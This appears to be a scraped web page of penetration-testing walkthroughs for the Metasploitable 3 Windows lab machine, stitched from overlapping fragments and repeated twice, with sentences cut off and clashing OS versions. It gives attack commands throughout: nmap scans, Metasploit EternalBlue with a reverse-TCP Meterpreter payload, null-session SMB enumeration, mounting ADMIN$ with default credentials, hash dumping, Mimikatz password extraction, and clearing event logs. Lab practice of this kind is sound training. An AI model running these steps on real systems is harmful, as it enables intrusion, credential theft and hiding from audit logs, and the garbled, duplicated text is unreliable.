Metasploitable 3 Windows Walkthrough Today

Check vulnerability:

nmap --script smb-vuln-ms17-010 -p445 192.168.56.105

Exploit using Metasploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.56.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.10   # Kali IP
run

Now that you are SYSTEM, what do you do?

SMB is often the weakest link in Windows environments. We can use enum4linux to enumerate shares and users.

enum4linux -a 192.168.1.105

You may find anonymous access to shares or weak passwords. However, a specific issue with Metasploitable 3 involves the Apache Tomcat Manager credentials found in configuration files, or simply brute-forcing the SMB login for users like vagrant or `Administrator

This walkthrough provides a comprehensive guide to setting up and exploiting Metasploitable 3, a Windows-based vulnerable virtual machine designed by Rapid7 for penetration testing practice. 1. Introduction to Metasploitable 3

Unlike its predecessor (Metasploitable 2), version 3 is built from the ground up using automation tools. It focuses on modern vulnerabilities found in Windows environments, specifically Windows Server 2008 R2. It’s an essential playground for learning lateral movement, service exploitation, and privilege escalation. 2. Lab Environment Setup Before you begin, ensure your lab environment is ready: Target: Metasploitable 3 (Windows) Attacker: Kali Linux

Network: Both VMs should be on a Host-Only or NAT Network to ensure they can communicate while remaining isolated from the internet. 3. Phase 1: Reconnaissance & Scanning Start by identifying the target IP and open services. Nmap Scan: nmap -sV -sC -O -p- Use code with caution. What to look for: Port 80/443/8080: HTTP services (IIS, Apache, GlassFish).

Port 445: SMB (Potential for EternalBlue or share enumeration). Port 3306: MySQL. Port 9200: Elasticsearch. 4. Phase 2: Exploitation Vectors Vector A: Exploiting HTTP (Port 8080 - GlassFish)

Metasploitable 3 often runs a GlassFish server. This is a common entry point.

Search for Exploits: In Metasploit, search for glassfish_deployer. Configuration:

use exploit/multi/http/glassfish_deployer set RHOSTS set RPORT 8080 run Use code with caution. Result: If successful, you will gain a Meterpreter session. Vector B: Exploiting SMB (Port 445) metasploitable 3 windows walkthrough

Since this is a Windows 2008 R2 machine, it might be vulnerable to MS17-010 (EternalBlue). Verify: Use auxiliary/scanner/smb/smb_ms17_010. Exploit:

use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run Use code with caution.

Result: This typically grants SYSTEM level access immediately. 5. Phase 3: Post-Exploitation & Privilege Escalation

If you gained access as a low-privilege user (e.g., through a web app), you need to escalate. Enumeration with Local Exploit Suggester: Background your session (Ctrl+Z). use post/multi/recon/local_exploit_suggester. set SESSION 1 and run.

Common Target: Look for AlwaysInstallElevated registry keys or unquoted service paths. 6. Phase 4: Looting and Persistence Once you have admin/SYSTEM access:

Dump Hashes: Use hashdump in Meterpreter to grab NTLM hashes.

Mimikatz: Load the kiwi extension (load kiwi) to retrieve cleartext passwords from memory using creds_all.

Flags: Search the Administrator desktop and C:\ root for "flags" (usually .txt files) to complete the challenge. 7. Summary of Key Vulnerabilities Vulnerability Metasploit Module SMB exploit/windows/smb/ms17_010_eternalblue Elasticsearch RCE (CVE-2014-3120) exploit/multi/elasticsearch/script_static_eval Web Server ManageEngine Desktop Central exploit/windows/http/manageengine_connection_id_rce Conclusion

Metasploitable 3 Windows is a goldmine for practicing "living off the land" techniques and understanding how misconfigured Windows services lead to full domain compromise. Always remember to document your steps, as the goal is to improve your reporting as much as your hacking.

Metasploitable 3 represents a significant evolution in vulnerable-by-design virtual machines, moving from the Linux-centric foundations of its predecessors to a modern, automated Windows Server 2012 R2 environment.

An essay-length walkthrough of this machine is not merely a list of commands, but a study in defense-in-depth failure Now that you are SYSTEM, what do you do

and the systematic exploitation of misconfigurations, outdated software, and weak administrative practices The Philosophy of Metasploitable 3

Unlike the original Metasploitable, which was a static "grab bag" of vulnerabilities, Metasploitable 3 is built using automation tools like

. This reflects the modern DevSecOps landscape; the vulnerabilities are not just accidental bugs but are often the result of intentional, scriptable misconfigurations that mirror real-world enterprise "technical debt." Phase I: Reconnaissance and Surface Analysis

The engagement begins with a comprehensive Nmap scan. On the Windows instance of Metasploitable 3, the attack surface is vast, typically revealing over 15 open ports. Standard Infrastructure:

DNS (53), HTTP (80), RPC (135), NetBIOS (139), and SMB (445). Application Layer:

Services like Jenkins (8080), GlassFish (4848), and Apache Struts often provide the initial foothold. The primary objective during reconnaissance is service fingerprinting

. Identifying that a web server is running "IIS 8.5" or "Apache 2.4.23" allows the attacker to cross-reference known CVEs (Common Vulnerabilities and Exposures). Phase II: The Initial Foothold (Web Exploitation)

The Windows version of Metasploitable 3 is frequently breached through its web application stack. One of the most classic entry points is the Unauthenticated Access: Often, the Jenkins Script Console is left unprotected. Remote Code Execution (RCE): Since Jenkins runs as a high-privileged service (often

or a dedicated service account), an attacker can execute Groovy scripts to spawn a reverse shell. The Shell:

Using a PowerShell one-liner, the attacker initiates a connection back to their Kali Linux machine, transitioning from an external observer to an internal user. Alternatively, vulnerabilities in Apache Struts (CVE-2017-5638)

allow for similar RCE vectors, highlighting the danger of unpatched middleware in a Windows environment. Phase III: Post-Exploitation and Lateral Movement Once a shell is established, the focus shifts to Enumeration . In Windows, this involves identifying: User Context: whoami /priv to see enabled privileges like SeImpersonatePrivilege Network Connections: netstat -ano to find internal services not exposed to the outside. Stored Credentials: Searching for unattend.xml files or credentials stored in registry keys. Metasploitable 3 intentionally includes the ManageEngine Desktop Central Note: Metasploitable 3 intentionally contains outdated

vulnerability. Exploiting this often leads to the discovery of cleartext passwords or hashes within the application's configuration files, which can be reused across other services—a hallmark of poor credential hygiene. Phase IV: Privilege Escalation The goal on a Windows target is always NT AUTHORITY\SYSTEM . Metasploitable 3 offers several paths: Insecure File Permissions:

Some services may have executable directories that are world-writable. By replacing a service binary with a malicious payload (like a Meterpreter

), an attacker can gain SYSTEM rights upon the next service restart. Kernel Exploits:

While modern Windows is more resilient, the 2012 R2 base allows for older exploits if updates are withheld. Token Impersonation: If the initial foothold is a service account, tools like can be used to steal tokens from logged-in administrators. Conclusion: Lessons in Modern Vulnerability

A walkthrough of Metasploitable 3 Windows is a masterclass in the interconnectivity of weaknesses

. It proves that a single unpatched web plugin (like Jenkins) can lead to the total compromise of a Windows domain environment. For security professionals, the machine serves as a reminder that "hardening" is not a one-time event but a continuous process of auditing service permissions, enforcing least privilege, and maintaining a rigorous patching schedule.

Here’s a structured text walkthrough for attacking Metasploitable 3 (Windows target) using Metasploit. This assumes you have Metasploitable 3 (Windows Server 2008 / Windows 2012) running and Kali Linux as the attacker.

We need a fast scan to see what is exposed.

nmap -sS -Pn -p- --min-rate 1000 192.168.56.102

Expected findings:

Because Metasploitable 3 has weak credentials, we can bypass complex exploitation entirely.

# Use vulners script to find known CVEs
nmap --script vulners -sV -p 445,8080,8585,9200 192.168.1.100

enum4linux -a 192.168.56.105
smbclient -L //192.168.56.105 -N   # null session

Mount share:

mount -t cifs //192.168.56.105/ADMIN$ /mnt/target -o username=vagrant,password=vagrant

clearev          # Clear event logs
rm C:\malware.exe
exit

Note: Metasploitable 3 intentionally contains outdated, vulnerable services. Always use in an isolated lab environment. The exact vulnerabilities depend on which version of Metasploitable 3 Windows you built (2012 R2 or 2008 R2). Some exploits (like EternalBlue) may crash the VM if used incorrectly.

Check vulnerability:

nmap --script smb-vuln-ms17-010 -p445 192.168.56.105

Exploit using Metasploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.56.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.10   # Kali IP
run

Now that you are SYSTEM, what do you do?

SMB is often the weakest link in Windows environments. We can use enum4linux to enumerate shares and users.

enum4linux -a 192.168.1.105

You may find anonymous access to shares or weak passwords. However, a specific issue with Metasploitable 3 involves the Apache Tomcat Manager credentials found in configuration files, or simply brute-forcing the SMB login for users like vagrant or `Administrator

This walkthrough provides a comprehensive guide to setting up and exploiting Metasploitable 3, a Windows-based vulnerable virtual machine designed by Rapid7 for penetration testing practice. 1. Introduction to Metasploitable 3

Unlike its predecessor (Metasploitable 2), version 3 is built from the ground up using automation tools. It focuses on modern vulnerabilities found in Windows environments, specifically Windows Server 2008 R2. It’s an essential playground for learning lateral movement, service exploitation, and privilege escalation. 2. Lab Environment Setup Before you begin, ensure your lab environment is ready: Target: Metasploitable 3 (Windows) Attacker: Kali Linux

Network: Both VMs should be on a Host-Only or NAT Network to ensure they can communicate while remaining isolated from the internet. 3. Phase 1: Reconnaissance & Scanning Start by identifying the target IP and open services. Nmap Scan: nmap -sV -sC -O -p- Use code with caution. What to look for: Port 80/443/8080: HTTP services (IIS, Apache, GlassFish).

Port 445: SMB (Potential for EternalBlue or share enumeration). Port 3306: MySQL. Port 9200: Elasticsearch. 4. Phase 2: Exploitation Vectors Vector A: Exploiting HTTP (Port 8080 - GlassFish)

Metasploitable 3 often runs a GlassFish server. This is a common entry point.

Search for Exploits: In Metasploit, search for glassfish_deployer. Configuration:

use exploit/multi/http/glassfish_deployer set RHOSTS set RPORT 8080 run Use code with caution. Result: If successful, you will gain a Meterpreter session. Vector B: Exploiting SMB (Port 445)

Since this is a Windows 2008 R2 machine, it might be vulnerable to MS17-010 (EternalBlue). Verify: Use auxiliary/scanner/smb/smb_ms17_010. Exploit:

use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run Use code with caution.

Result: This typically grants SYSTEM level access immediately. 5. Phase 3: Post-Exploitation & Privilege Escalation

If you gained access as a low-privilege user (e.g., through a web app), you need to escalate. Enumeration with Local Exploit Suggester: Background your session (Ctrl+Z). use post/multi/recon/local_exploit_suggester. set SESSION 1 and run.

Common Target: Look for AlwaysInstallElevated registry keys or unquoted service paths. 6. Phase 4: Looting and Persistence Once you have admin/SYSTEM access:

Dump Hashes: Use hashdump in Meterpreter to grab NTLM hashes.

Mimikatz: Load the kiwi extension (load kiwi) to retrieve cleartext passwords from memory using creds_all.

Flags: Search the Administrator desktop and C:\ root for "flags" (usually .txt files) to complete the challenge. 7. Summary of Key Vulnerabilities Vulnerability Metasploit Module SMB exploit/windows/smb/ms17_010_eternalblue Elasticsearch RCE (CVE-2014-3120) exploit/multi/elasticsearch/script_static_eval Web Server ManageEngine Desktop Central exploit/windows/http/manageengine_connection_id_rce Conclusion

Metasploitable 3 Windows is a goldmine for practicing "living off the land" techniques and understanding how misconfigured Windows services lead to full domain compromise. Always remember to document your steps, as the goal is to improve your reporting as much as your hacking.

Metasploitable 3 represents a significant evolution in vulnerable-by-design virtual machines, moving from the Linux-centric foundations of its predecessors to a modern, automated Windows Server 2012 R2 environment.

An essay-length walkthrough of this machine is not merely a list of commands, but a study in defense-in-depth failure

and the systematic exploitation of misconfigurations, outdated software, and weak administrative practices The Philosophy of Metasploitable 3

Unlike the original Metasploitable, which was a static "grab bag" of vulnerabilities, Metasploitable 3 is built using automation tools like

. This reflects the modern DevSecOps landscape; the vulnerabilities are not just accidental bugs but are often the result of intentional, scriptable misconfigurations that mirror real-world enterprise "technical debt." Phase I: Reconnaissance and Surface Analysis

The engagement begins with a comprehensive Nmap scan. On the Windows instance of Metasploitable 3, the attack surface is vast, typically revealing over 15 open ports. Standard Infrastructure:

DNS (53), HTTP (80), RPC (135), NetBIOS (139), and SMB (445). Application Layer:

Services like Jenkins (8080), GlassFish (4848), and Apache Struts often provide the initial foothold. The primary objective during reconnaissance is service fingerprinting

. Identifying that a web server is running "IIS 8.5" or "Apache 2.4.23" allows the attacker to cross-reference known CVEs (Common Vulnerabilities and Exposures). Phase II: The Initial Foothold (Web Exploitation)

The Windows version of Metasploitable 3 is frequently breached through its web application stack. One of the most classic entry points is the Unauthenticated Access: Often, the Jenkins Script Console is left unprotected. Remote Code Execution (RCE): Since Jenkins runs as a high-privileged service (often

or a dedicated service account), an attacker can execute Groovy scripts to spawn a reverse shell. The Shell:

Using a PowerShell one-liner, the attacker initiates a connection back to their Kali Linux machine, transitioning from an external observer to an internal user. Alternatively, vulnerabilities in Apache Struts (CVE-2017-5638)

allow for similar RCE vectors, highlighting the danger of unpatched middleware in a Windows environment. Phase III: Post-Exploitation and Lateral Movement Once a shell is established, the focus shifts to Enumeration . In Windows, this involves identifying: User Context: whoami /priv to see enabled privileges like SeImpersonatePrivilege Network Connections: netstat -ano to find internal services not exposed to the outside. Stored Credentials: Searching for unattend.xml files or credentials stored in registry keys. Metasploitable 3 intentionally includes the ManageEngine Desktop Central

vulnerability. Exploiting this often leads to the discovery of cleartext passwords or hashes within the application's configuration files, which can be reused across other services—a hallmark of poor credential hygiene. Phase IV: Privilege Escalation The goal on a Windows target is always NT AUTHORITY\SYSTEM . Metasploitable 3 offers several paths: Insecure File Permissions:

Some services may have executable directories that are world-writable. By replacing a service binary with a malicious payload (like a Meterpreter

), an attacker can gain SYSTEM rights upon the next service restart. Kernel Exploits:

While modern Windows is more resilient, the 2012 R2 base allows for older exploits if updates are withheld. Token Impersonation: If the initial foothold is a service account, tools like can be used to steal tokens from logged-in administrators. Conclusion: Lessons in Modern Vulnerability

A walkthrough of Metasploitable 3 Windows is a masterclass in the interconnectivity of weaknesses

. It proves that a single unpatched web plugin (like Jenkins) can lead to the total compromise of a Windows domain environment. For security professionals, the machine serves as a reminder that "hardening" is not a one-time event but a continuous process of auditing service permissions, enforcing least privilege, and maintaining a rigorous patching schedule.

Here’s a structured text walkthrough for attacking Metasploitable 3 (Windows target) using Metasploit. This assumes you have Metasploitable 3 (Windows Server 2008 / Windows 2012) running and Kali Linux as the attacker.

We need a fast scan to see what is exposed.

nmap -sS -Pn -p- --min-rate 1000 192.168.56.102

Expected findings:

Because Metasploitable 3 has weak credentials, we can bypass complex exploitation entirely.

# Use vulners script to find known CVEs
nmap --script vulners -sV -p 445,8080,8585,9200 192.168.1.100

enum4linux -a 192.168.56.105
smbclient -L //192.168.56.105 -N   # null session

Mount share:

mount -t cifs //192.168.56.105/ADMIN$ /mnt/target -o username=vagrant,password=vagrant

clearev          # Clear event logs
rm C:\malware.exe
exit

Note: Metasploitable 3 intentionally contains outdated, vulnerable services. Always use in an isolated lab environment. The exact vulnerabilities depend on which version of Metasploitable 3 Windows you built (2012 R2 or 2008 R2). Some exploits (like EternalBlue) may crash the VM if used incorrectly.